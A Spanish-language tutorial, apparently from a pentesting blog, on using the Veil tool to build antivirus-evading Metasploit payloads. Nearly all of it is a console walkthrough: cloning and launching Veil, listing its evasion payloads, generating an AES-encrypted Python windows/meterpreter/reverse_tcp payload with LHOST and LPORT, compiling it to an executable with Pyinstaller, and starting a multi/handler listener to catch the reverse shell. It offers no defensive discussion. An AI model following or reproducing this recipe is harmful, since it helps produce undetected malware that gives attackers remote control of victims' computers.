Veil – Evasión de Antivirus
Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.
Descarga Veil:
git clone https://github.com/ChrisTruncer/Veil cd Veil python Veil.py
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py
=========================================================================
Veil First Run Detected... Initializing Script Setup...
=========================================================================
[*] Executing ./config/update.py...
[>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
[*] OPERATING_SYSTEM = Linux
[*] TERMINAL_CLEAR = clear
[*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
[*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
[*] Path '/root/veil-output/source/' Created
[*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
[*] Path '/ro
ot/veil-output/compiled/' Created
[*] TEMP_DIR = /tmp/
[*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
[*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
[*] MSFVENOM_OPTIONS =
[*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py
=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
[!] WARNING: Official support for Kali Linux (x86) only at this time!
[!] WARNING: Continue at your own risk!
Main Menu
18 payloads loaded
Available commands:
use use a specific payload
update update Veil to the latest version
list list available languages/payloads
info information on a specific payload
exit exit Veil
[>] Please enter a command: list
=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
[!] WARNING: Official support for Kali Linux (x86) only at this time!
[!] WARNING: Continue at your own risk!
Available payloads:
1) c/VirtualAlloc Poor
2) c/VoidPointer Poor
3) c#/VirtualAlloc Poor
4) c#/b64SubVirtualAlloc Normal
5) native/BackdoorFactory Normal
6) native/hyperion Normal
7) native/pescrambler Normal
8) powershell/DownloadVirtualAlloc Excellent
9) powershell/PsexecVirtualAlloc Excellent
10) powershell/VirtualAlloc Excellent
11) python/AESEncrypted Excellent
12) python/ARCEncrypted Excellent
13) python/Base64Encode Excellent
14) python/DESEncrypted Excellent
15) python/FlatInjection Normal
16) python/LetterSubstitution Excellent
17) python/MeterHTTPContained Excellent
18) python/MeterHTTPSContained Excellent
[>] Please enter a command: 11
=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
Payload: python/AESEncrypted loaded
Required Options:
Name Current Value Description
---- ------------- -----------
compile_to_exe Y Compile to an executable
inject_method virtual [virtual]alloc or [void]pointer
use_pyherion N Use the pyherion encrypter
Available commands:
set set a specific option value
info show information about the payload
help [crypters] show help menu for payload or crypters
generate generate payload
exit exit Veil
back go to the main menu
[>] Please enter a command: generate
=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
[?] Use msfvenom or supply custom shellcode?
1 - msfvenom (default)
2 - Custom
[>] Please enter the number of your choice: 1
[*] Press [enter] for windows/meterpreter/reverse_tcp
[*] Press [tab] to list available payloads
[>] Please enter metasploit payload:
[>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx
[>] Enter value for 'LPORT': 4444
[>] Enter extra msfvenom options in OPTION=value syntax:
[*] Generating shellcode...
=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files:
[?] How would you like to create your payload executable?
1 - Pyinstaller (default)
2 - Py2Exe
[>] Please enter the number of your choice: 1
Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado.
Ahora abrimos Metasploit:
msf> use exploit/multi/handler msf exploit(handler) > exploit
